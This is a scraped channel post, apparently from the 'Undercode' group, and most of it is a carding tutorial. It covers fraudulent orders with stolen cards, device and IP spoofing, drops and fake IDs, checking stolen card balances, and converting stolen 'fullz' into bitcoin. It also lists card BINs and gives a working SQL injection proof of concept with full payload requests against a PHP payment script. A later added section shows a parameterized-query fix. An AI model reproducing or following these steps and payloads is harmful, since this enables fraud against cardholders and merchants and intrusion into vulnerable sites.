13. In Billing address enter CC holder address. Now proceed to payment.
14. I am sure if you do everything right then order will be successfully placed..
15. Wait for order to arrive to your shipping address. When they arrive the corier boy will call you. The ask for any ID card. If you can make fake ID card then good. Otherwise show your any ID card (Adhar Card, Voter ID, College ID card)
How to Card From Mobile:
Though I donβt prefer carding from mobile. But if you follow belowsteps carefully then you can do that.
Basic reqirements for carding from Mobile :
1. Mobile must be rooted. (offcourse I pref
er any Android smartphone)
2. You must install few apps : IMEI changer, Phone ID changer, Android ID changer, Proxy Droid, CCleaner
3. You can use HMA VPN for carding in mobile.
4. You use SOCK5 proxy with Proxy Droid apps.
5. You must change IMEI, Android ID etc evrything before starting carding.
6. Now connect proxy droid with SOCKS5 proxy and connect it.
7. Now follow all steps of carding that mentioned aboveβ¦
Ok, so you got your cc, your drop and try to be anonymous as you can make yourself.
Now, what sites are cardable?
-ANY AND ALL SITES ARE CARDABLE-
Why do I say that? because itβs true. Whatever your card, make sure that you have all your info prepared before carding it. If you donβt get success first time then you have to use other BIN CC and Others Method. Have used your brain & find different Logic for a different site. You may Kill 2-3 CC when trying any sites. But you will find out the working method for any site
OKβ¦.You know enough about CC. But donβt understand nothing.. Now let me clear all your doubt about acronyms and termsβ¦.
1. CC (Credit Card)
2. CCN (Credit Card Number) β Includes the number of the card and expiration date, no name or address.
3. CVV(Credit Verification Value) / (Card Security Code) / CVV2- The number on the back of the card used for verification purposes. 3 digit number for visa/mc and 4 digit for AMEX (American Express) (There is also CVV1 which is a verification number that is written into the magstripe on the back of the card that is read when the card is swiped)
4. Dropβ an address where you can send carded goods, not your own house or friend or relatives.
5. SSN (Social Security Number) β one of the details of CC holder, used to bypass security measures
6. MMN (Mothers Maiden Name) β Comes in handy when bypassing security measures on VBV/MCSC. One of your security question.
7. DOB β Date of Birth β Used to bypass some security measures.
8. COB (Change of Billing) β Some stores will only ship large/high priced items if the shipping and billing info match, these can be obtained through some cvv sellers, usually in the form of a βFullsβ
9. Fulls βYou listen many times βFulls/ Fullzβ. It is nothing but CC Details with more info eg. security question answers, SSN, DOB, MMN, etc. which can be used for COB, etc.
10. AVS (Address Verification Service) β System that checks the billing address entered against the credit card companyβs records.
11. VBV (Verified by Visa) β Extra verification process initially added by visa, there are different types of authentication used, most notably would be a password, date of birth, social security number, or mothers maiden name.
12. MCSC (MasterCard SecureCode) β MC (MasterCard) adopted this process after VBV came out, basically the same thing but with mastercards.
13. POS (Point of Sale) β Terminal at a physical shop where the card is swiped/read
14. Dump β The information that is written onto the magnetic stripe on the back of the card, the only way to get dump is with a skimmer, comes in different βtracksβ which I will not be explaining β a dump would look like
4131980030032319=11101010000000006460
15. Skimmer β A device that is normally attached to an atm where you insert your card, which records your card information (there are other variants, that is the most common)
16. Embosser β A device that βstampsβ the cards to produce the raised lettering
17. Tipper β A device that adds the gold/silver accents to the embossed characters
18. MSR (Magnetic Stripe Reader/Writer) Used in the carding scene for writing dumps (and drivers license, student ID) info to blank cards or gift cards (if you want to use blank white cards, you will need a printer for the card template, embosser/tipper also, which can get costly to buy)
19. BIN (Bank Identification Number) β The first 6 digits of a card number (this will be gone over in more detail later on)
20. Novs (Novelty ID / Fake ID) β Commonly used for signing at drops, store pickups, WU Drops, Bank Drops, etc.
21. VPN (Virtual Privat
e Network ) β This will change your IP to wherever the location is of the VPN server. This is used with an application rather than through your browser as with socks. Watch out as some VPN providers will keep logs. But it leaks our DNS info so it is not safe
22. BTC (Bitcoin) β It is a digital currency. Used for buying anything in the digital world. You need it to buy CC, SOCKS, VPN etc and even you can exchange your local currency (INR/Dollar etc) to BTC. You can create wallet here www.blockchain.com
Few things you must remember before starting Carding:
Security to me is a key aspect of carding. However, an important thing to note is that IF THEY WANT TO GET YOU THAT BADLY; THEN THEY WILL NO MATTER WHAT.
Here are a few key security aspects you should take into consideration before getting started:
β When you have a CC, the next step is to get a socks5 in either the same city and state as the cardholder or as close to it as you can find. You must use socks.
β I personally use Firefox since it is stable, easy to use, you can load many unique and helpful plugins (tamper data, sniffers, etc).
β Many carders get sloppy over time and will neglect to clear history, or instead of shutting down their computer just put it to sleep so they donβt have to wait for it to decrypt, etc. Moral here? DONβT BE A LAZY!
β Emails β I personally use a new email for every site I card. Either Gmail or Yahoo works well for me.
How to know what is brand of CC at a glance:
If CCN (Credit Card Number) start with 3 then it is American Express (AMEX), if it starts with 4 then it is Visa, if it starts with 5 then itβs Mastercardβ¦With VBV CC, most notably would be a password, date of birth, social security number, or mothers maiden name.
**In order to get by VBV you need the password, if you want to reset the password then you will need the DOB (date of birth), MMN (mothers maiden name), and SSN (social security number). So I personally prefer always By NON-VBV Credit Card
How to check CC Is Live or Dead:
There are so many websites that check CC live or dead. At the time of checking they charge CC $0.001. But almost 80% site kill the CC. So we never use it. There also few tools available on the internet for checking CC. It may be Backdoor/ Trojan. So donβt use itβ¦..
There is no easy method for that. Carder makes there own way to do that. One of them is β¦ Go to any porn website. Buy the membership and use your CC. If you got success then CC is Live. You must follow carding rule. Like using socks, rdp bla.. blah.
Search youtube for find latest method. Or google it βHow to check CC is live or Deadβ. You will get so many latest method.
How to check CC Balance (Skype Method):
This method only working for US & UK CC only
1. Check your BIN in www.binspro.com There you will get bank name. For above example, BIN (430587) bank is Capital One, USA.
2. Now search phone number of this bank in google. For Capital One itβs +1-800-935-9935
3. Call this number from skype itβs free since itβs toll-free number.
4. Now the automatic robot will ask you few details. Ex. CCN, CVV etc.
5. Now put your info by using your keyboard.
6. It will automatically tell you the CC balance.
WRITTEN BY uNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Amazon Right Bin cc is available.
Bin Amazon Shopping
> Bin : 41472023xxxxxxxx
Date : 10/21
Cvv : 666
> IP : USA
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Ali express bins
t.me/UndercodeTesting
51080501528xxxxx
08/22
Ip - USA
π¦Bins : Netflix
545404xxxxxxxxxx
530998xxxxxxxxxx
518695xxxxxxxxxx
IP: BRAZIL
CCLEANER V4.20.3 B800006534 [PRO]
> https://play.google.com/store/apps/details?id=com.piriform.ccleaner>
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BEST TELEGRAM BOTS YOU SHOULD KNOW RECOMMENDED BY UNDERCODE:
1) BotFather
BotFather is the official Telegram Bot used to create bots and change settings for existing ones.
You'll need BotFather even if you're not going to make your own bots as a bot developer. Some bots for Telegram channel admins will ask you to use BotFather to generate Telegram Bot API tokens, so it's good to get familiar with this procedure before we go any further.
Creating a new Telegram bot is pretty straightforward.
Just open BotFather, send /newbot command, pick a name and a username:
2) ControllerBot
ControllerBot is a feature-rich bot for Telegram channel owners.
It allows you to:
write rich-text posts with Markdown/HTML markup;
add reaction buttons (Emoji, text or both);
add button to open post comments;
schedule posts;
add self-destruct timer for temporary posts;
see channel stats.
Here is an example of how post reactions can be added with ControllerBot:
3) LivegramBot
LivegramBot is a feedback bot constructor.
Here is a self-explanatory example of this bot usage:
Feedback bots like this one can be used for everything: channels, groups, bots and even websites.
4) VoteBot
VoteBot is a bot for creating polls in Telegram. Polls can be shared with friends or published in channels and groups.
Using VoteBot is very simple:
When the poll is created, type @vote in your channel to open the polls list:
5) Giphy GIF Search
Giphy GIF Search is a bot for searching and posting gifs. It can be used with channels as well.
Type @gif with a search query in your channel and gif suggestions will show up:
6) Telegraph
telegra.ph is a minimalistic publishing tool that allows you to create richly formatted posts with images, videos and other embedded content.
Telegram supports Instant View for posts published with telegra.ph, which lets readers open your posts right in the Telegram app without visiting any other website.
To manage your telegra.ph publications and log in across any number of devices try the official Telegraph bot.
7) InviteMember
InviteMember is a bot platform for subscription/membership bots.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fast CC TO BTC :
> CC TO BTC TRICK
- Buy A Fresh Fullz CC (Visa/Mastercard)From Trusted Vendors Or *ME* (Fullz Have SSN)
- If You Bought Dallas(city),Texas(st) Cc Use Dallas Ip (must use 911 vpn or Rdp)
-After Connecting ip Go to outlook and make an email same as Cc Owner Name
- Then Go to cex.io ( cex.io is the best site to buy btc from credit cards)
- Register A New Account . Use Outlook eMail To Register as New :)
- After Registering, Verify your Email
- Ok Then We Can Add Balance To Cex.io ...... Click On Deposit then it will be redirect to payment gate.
- Now Fill Cc Details & Choose The Amount ( Choose Below 150$ First then succeeded we Can add more)
- Then Fill the Billing Address & SSN (Fullz Cc Will Have Billing Address & SSN)
- Then Click Proceed
- Then Account Will Be Funded with your choosed Amount (unless you use dead card) & After Success Fund More Amount How Much You Can Do With The Credit Card
- Now go to home page and click Buy/Sell
- Buy Bitcoin With Your Deposited Amount (If You deposited 700$ buy btc below 700$)
- Now you'll be turned into 700$ to Btc
- Now Go to Withdraw select Btc Then put your wallet address & select amount then click withdraw
Hurreyyy!!!! Now The Btc Instantly Will transfer to Your wallet.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The 2018 Paypall CVE IS NOW PUBLIC FREE
> PayPal/Credit Card/Debit Card Payment 1.0 - SQL Injection
t.me/UndercodeTesting
π¦Tested by Undercode :
# POC:
# 1)
# http://localhost/[PATH]/index.php?p=accomodation&q=[SQL]
#
#[PATH]/accomodation.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "' AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $_GET['q'] . "'";
#56
#57
#58
#59 }
#60
#61 $accomodation = ' | ' . $_GET['q'];
#62 ?>
#...
GET /[PATH]/index.php?p=accomodation&q=-Standard%20Room%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:55:17 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/index.php?p=rooms&q=[SQL]
#
#[PATH]/room_rates.php
#...
#50 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND NUMPERSON = " . $_POST['person'];
#51
#52
#53 }elseif(isset($_GET['q'])){
#54
#55 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ROOM LIKE '%" . $_GET['q'] . "%'";
#56
#57
#58 }else{
#59 $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID";
#60 }
#61
#62 $accomodation = ' | ' . @$_GET['q'];
#63 ?>
#...
GET /[PATH]/index.php?p=rooms&q=RM%20223%27%20%20UNION(SELECT(1),(2),(3),(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),(5),(6),(7),(8),(9),(10),(11),(12))--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:58:47 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/admin/login.php
#
#[PATH]/admin/login.php
#...
#58 if (isset($_POST['btnlogin'])) {
#59 //form has been submitted1
#60
#61 $uname = trim($_POST['email']);
#62 $upass = trim($_POST['pass']);
#...
@UndercodeTesting
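The root cause in the accomodation.php and room_rates.php excerpts above is that $_GET['q'] and $_POST['person'] are concatenated straight into the SQL string. The following is an added example, not code from the affected application or from the original post: it puts the concatenated query beside a parameterized rewrite. Assumptions: a PDO connection (an in-memory SQLite database stands in for the real one), the column-to-table layout, the ROOMID column, the sample rows and the function names are all constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed stand-in database. Table and column names ACCOMID, ACCOMODATION,
// ROOM and NUMPERSON come from the excerpt; their placement, ROOMID and the
// rows are assumptions.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE tblaccomodation (ACCOMID INTEGER PRIMARY KEY, ACCOMODATION TEXT)');
    $pdo->exec('CREATE TABLE tblroom (ROOMID INTEGER PRIMARY KEY, ACCOMID INTEGER, ROOM TEXT, NUMPERSON INTEGER)');
    $pdo->exec("INSERT INTO tblaccomodation VALUES (1, 'Standard Room'), (2, 'Suite')");
    $pdo->exec("INSERT INTO tblroom VALUES (1, 1, 'RM 223', 2), (2, 2, 'RM 301', 4)");
    return $pdo;
}

// "Before": same string concatenation as line 55 of the excerpt. The value of
// $q becomes part of the SQL text, so a quote in it changes the statement.
function find_rooms_concat(PDO $pdo, string $q): array
{
    $query = "SELECT * FROM tblroom r ,tblaccomodation a WHERE r.ACCOMID=a.ACCOMID AND ACCOMODATION='" . $q . "'";
    return $pdo->query($query)->fetchAll(PDO::FETCH_ASSOC);
}

// "After": the SQL text is fixed; request values travel only as bound
// parameters, and the numeric field is validated before it is bound.
function find_rooms(PDO $pdo, ?string $q, ?string $person): array
{
    $sql = 'SELECT r.ROOM, a.ACCOMODATION, r.NUMPERSON
              FROM tblroom r
              JOIN tblaccomodation a ON r.ACCOMID = a.ACCOMID';
    $where = [];
    $params = [];

    if ($q !== null && $q !== '') {
        $where[] = 'a.ACCOMODATION = :q';
        $params[':q'] = $q;
    }
    if ($person !== null && $person !== '') {
        // NUMPERSON was unquoted in the original query, so reject non-integers.
        $n = filter_var($person, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 1, 'max_range' => 50]]);
        if ($n === false) {
            throw new InvalidArgumentException('person must be a small positive integer');
        }
        $where[] = 'r.NUMPERSON = :n';
        $params[':n'] = $n;
    }
    if ($where) {
        $sql .= ' WHERE ' . implode(' AND ', $where);
    }

    $stmt = $pdo->prepare($sql);
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, is_int($value) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = demo_db();

// Constructed input containing a quote, as a request parameter might.
$hostile = "Standard Room' OR '1'='1";

// The concatenated query returns rows the caller never asked for; the
// prepared one treats the whole string as a (non-matching) room type.
printf("concatenated, hostile q: %d rows\n", count(find_rooms_concat($pdo, $hostile)));
printf("prepared, hostile q:     %d rows\n", count(find_rooms($pdo, $hostile, null)));
printf("prepared, normal q:      %d rows\n", count(find_rooms($pdo, 'Standard Room', '2')));

// A non-numeric person value is refused before any SQL runs.
try {
    find_rooms($pdo, 'Standard Room', '2 OR 1=1');
} catch (InvalidArgumentException $e) {
    printf("rejected person value: %s\n", $e->getMessage());
}
```

The same change applies to the ROOM LIKE query in room_rates.php: bind the search term as a parameter and add the % wildcards to the bound value, not to the SQL text.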
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ how to buy a working cc ?
pinterest.com/undercode_Testing
> Are u a hacker then u easily bypass otp or you don't know ss7 attack. Then buy ssn+dob payment base cc. It cc don't require otp on payment. You fill ssn+dob on payment getway. then pay is susses.
π¦ Where i buy amazon egift cards??
1) Go on
https://www.mtcgame.com/en-GB
2) Login on your created account.
It payment getaway is easy and 1 more site https://www.mygiftcardsupply.com/shop/amazon-gift-cards/
have easy pay. Getway .
π¦ Carding tools
Socks5/rdp ,mac address changer,ccleaner.
π¦ How to use securely???
Socks5/rdp.-- You do not use the same zip code for the owner of cc or cc. use rdp/socks5 according to state.
Don't clean cookies in carding time.
Then fill ssn and dob on payment getway..
@UndercodeTesting
Pinterest
UnderCode TESTING (UNDERCODE_TESTING) - Profile | Pinterest
UnderCode TESTING | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011